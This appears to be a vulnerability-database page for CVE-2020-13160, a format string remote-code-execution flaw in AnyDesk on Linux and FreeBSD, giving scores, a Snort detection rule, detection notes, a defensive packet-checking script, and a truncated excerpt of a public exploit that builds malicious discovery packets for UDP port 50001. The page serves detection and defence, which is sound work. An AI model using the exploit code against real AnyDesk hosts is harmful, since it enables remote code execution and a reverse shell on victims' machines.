CVE-2020-13160
Published 2020-06-09

CVE-2020-13160: AnyDesk before 5.5.3 on Linux and FreeBSD has a format string vulnerability that can be exploited for remote code execution.
Priority P1 · 81 · critical · 9.8 CVSS 3.1
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 80.55% (99.6th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anydesk | anydesk | < 5.5.3 | 5.5.3 |
Detection & IOCs (extracted from sources)

- bytes: `|3e d1 01|` at start of UDP discovery packet
- bytes: UDP payload bytes `|3e d1|` at depth 2
snort

```
alert udp $EXTERNAL_NET any -> $HOME_NET 50001 (msg:"ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)"; isdataat:16; content:"|3e d1|"; depth:2; byte_test:4,>,16,11,relative,big; pcre:"/^.{11}([\xC0-\xC1]|[\xF5-\xFF]|\xE0[\x80-\x9F]|\xF0[\x80-\x8F]|[\xC2-\xDF](?![\x80-\xBF])|[\xE0-\xEF](?![\x80-\xBF]{2})|[\xF0-\xF4](?![\x80-\xBF]{3})|(?<=[\x00-\x7F\xF5-\xFF])[\x80-\xBF]|(?<![\xC2-\xDF]|[\xE0-\xEF]|[\xE0-\xEF][\x80-\xBF]|[\xF0-\xF4]|[\xF0-\xF4][\x80-\xBF]|[\xF0-\xF4][\x80-\xBF]{2})[\x80-\xBF]|(?<=[\xE0-\xEF])[\x80-\xBF](?![\x80-\xBF])|(?<=[\xF0-\xF4])[\x80-\xBF](?![\x80-\xBF]{2})|(?<=[\xF0-\xF4][\x80-\xBF])[\x80-\xBF](?![\x80-\xBF]))/R"; reference:url,devel0pment.de/?p=1881; reference:cve,2020-13160; classtype:attempted-user; sid:2030348; rev:2;)
```

- The exploit targets UDP port 50001 — monitor for unexpected inbound UDP traffic to this port from external sources, especially with packet sizes consistent with a discovery packet carrying shellcode.
- Discovery packets begin with magic bytes 0x3e 0xd1 0x01; any UDP packet to port 50001 starting with these bytes and containing format string specifiers (e.g., %n, %x, %ln) in string fields is highly suspicious.
- The AnyDesk GUI frontend process must be running for exploitation to succeed; the discovery service alone is insufficient. Monitor for AnyDesk GUI process execution on Linux/FreeBSD endpoints.
- Successful exploitation results in a reverse shell spawned under the AnyDesk GUI user's context; monitor for unexpected outbound TCP connections (e.g., to port 4444) from the AnyDesk process.
- The vulnerability only affects AnyDesk versions before 5.5.3 on Linux and FreeBSD; Windows versions are not affected.
- The ET Snort rule (sid:2030348) is noted as having 'Significant' performance impact due to the complex PCRE; tune deployment accordingly.
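Because the ET rule's PCRE is expensive, a cheap structural check is useful for triage of captured UDP/50001 payloads (for example when hunting through a pcap after an alert). The following is an added example written for this page, not code from the rule authors, Exploit-DB, or AnyDesk. It parses the discovery packet using the field layout visible in the PoC on this page (magic, ad_id, zero word, `02`, os byte, then length-prefixed hostname, user, info and func strings) and reports the two conditions the detection notes above describe: a hostname length field greater than 16 (as I read the rule, `byte_test:4,>,16,11,relative,big` reads the big-endian u32 at payload offset 13, which is exactly that length field) and printf-style conversion specifiers inside any string field. The format-specifier regex, the `build_discovery_packet` fixture and all sample payloads are my own constructions; nothing is taken from real traffic.

```python
import re
import struct

# Discovery packet layout, taken from the PoC on this page (gen_discover_packet):
#   3e d1 01 | ad_id u32 BE | u32 0 | 02 | os | u32 len + hostname | u32 len + user
#   | u32 0 | u32 len + info | 00 | u32 len + func | 02 c3 51
MAGIC = b"\x3e\xd1\x01"
# 3 (magic) + 4 (ad_id) + 4 (zero) + 2 (02, os) = 13: the offset the ET rule's
# byte_test reads (content match at depth 2, then 11 bytes relative to it).
HOSTNAME_LEN_OFFSET = 13
# The rule fires when that big-endian u32 exceeds 16.
RULE_LEN_THRESHOLD = 16

# printf-style conversion specifier. Assumption: a conservative regex of my own,
# not taken from the page or from any vendor rule.
FMT_SPEC = re.compile(
    rb"%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|q|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)


def parse_discovery_packet(payload: bytes) -> dict:
    """Split a discovery packet into its fields; raise ValueError on anything malformed."""
    if len(payload) < HOSTNAME_LEN_OFFSET + 4 or payload[:3] != MAGIC:
        raise ValueError("not an AnyDesk discovery packet")
    ad_id, _reserved = struct.unpack_from(">II", payload, 3)
    fields = {"ad_id": ad_id, "os": payload[12]}
    pos = HOSTNAME_LEN_OFFSET

    def read_string(name: str) -> None:
        nonlocal pos
        if pos + 4 > len(payload):
            raise ValueError(f"truncated before {name} length field")
        (length,) = struct.unpack_from(">I", payload, pos)
        pos += 4
        if length > len(payload) - pos:
            raise ValueError(f"{name} length {length} exceeds remaining payload")
        fields[name] = payload[pos:pos + length]
        fields[name + "_len"] = length
        pos += length

    read_string("hostname")
    read_string("user")
    pos += 4   # reserved u32 (zero in the PoC)
    read_string("info")
    pos += 1   # single NUL byte
    read_string("func")
    return fields


def assess_discovery_packet(payload: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    try:
        fields = parse_discovery_packet(payload)
    except ValueError as exc:
        return [f"malformed: {exc}"]

    findings = []
    if fields["hostname_len"] > RULE_LEN_THRESHOLD:
        findings.append(
            f"hostname length {fields['hostname_len']} > {RULE_LEN_THRESHOLD} "
            "(matches the ET rule's byte_test condition)"
        )
    for name in ("hostname", "user", "info", "func"):
        match = FMT_SPEC.search(fields[name])
        if match:
            findings.append(f"format specifier {match.group().decode('latin-1')!r} in {name}")
        try:
            fields[name].decode("utf-8")
        except UnicodeDecodeError:
            findings.append(f"{name} is not valid UTF-8")
    return findings


def build_discovery_packet(hostname: bytes, user: bytes = b"user",
                           info: bytes = b"", func: bytes = b"main") -> bytes:
    """Constructed test fixture following the layout above (all values are made up)."""
    pkt = MAGIC + struct.pack(">II", 0x01020304, 0) + b"\x02\x01"
    pkt += struct.pack(">I", len(hostname)) + hostname
    pkt += struct.pack(">I", len(user)) + user
    pkt += struct.pack(">I", 0)
    pkt += struct.pack(">I", len(info)) + info
    pkt += b"\x00"
    pkt += struct.pack(">I", len(func)) + func
    pkt += b"\x02\xc3\x51"
    return pkt


# Constructed sample payloads (not real captures).
BENIGN = build_discovery_packet(b"laptop-01")
SUSPICIOUS = build_discovery_packet(b"workstation-%08x-%08x-%n")
TRUNCATED = MAGIC + struct.pack(">II", 1, 0) + b"\x02\x01" + struct.pack(">I", 100) + b"abc"

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("suspicious", SUSPICIOUS), ("truncated", TRUNCATED)):
        print(label, assess_discovery_packet(pkt) or ["no findings"])
```

Feed `assess_discovery_packet` the UDP payload of each packet to port 50001 (for example from a pcap via your preferred reader). The length check alone reproduces the rule's numeric condition and will also flag long but legitimate hostnames, so treat the format-specifier and non-UTF-8 findings as the higher-confidence signals.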
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
Suricata: ET EXPLOIT AnyDesk UDP Discovery Format String (CVE-2020-13160)
suricata · 2020-06-16 · CVSS 9.8
Exploit-DB: AnyDesk 5.5.2 - Remote Code Execution
exploitdb · 2021-03-03
---
```python
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881

#!/usr/bin/env python
import struct
import socket
import sys

ip = '192.168.x.x'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
    d = chr(0x3e)+chr(0xd1)+chr(0x1)
    d += struct.pack('>I', ad_id)
    d += struct.pack('>I', 0)
    d += chr(0x2)+chr(os)
    d += struct.pack('>I', len(hn)) + hn
    d += struct.pack('>I', len(user)) + user
    d += struct.pack('>I', 0)
    d += struct.pack('>I', len(inf)) + inf
    d += chr(0)
    d += struct.pack('>I', len(func)) + func
    d += chr(0x2)+chr(0xc3)+chr(0x51)
    return d

# msfvenom -p linux/x64/shell_re
```
Metasploit: AnyDesk GUI Format String Write
metasploit
The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
No writeups or analysis indexed.
References

- http://packetstormsecurity.com/files/158291/AnyDesk-GUI-Format-String-Write.html
- http://packetstormsecurity.com/files/161628/AnyDesk-5.5.2-Remote-Code-Execution.html
- https://devel0pment.de/?p=1881
- https://download.anydesk.com/changelog.txt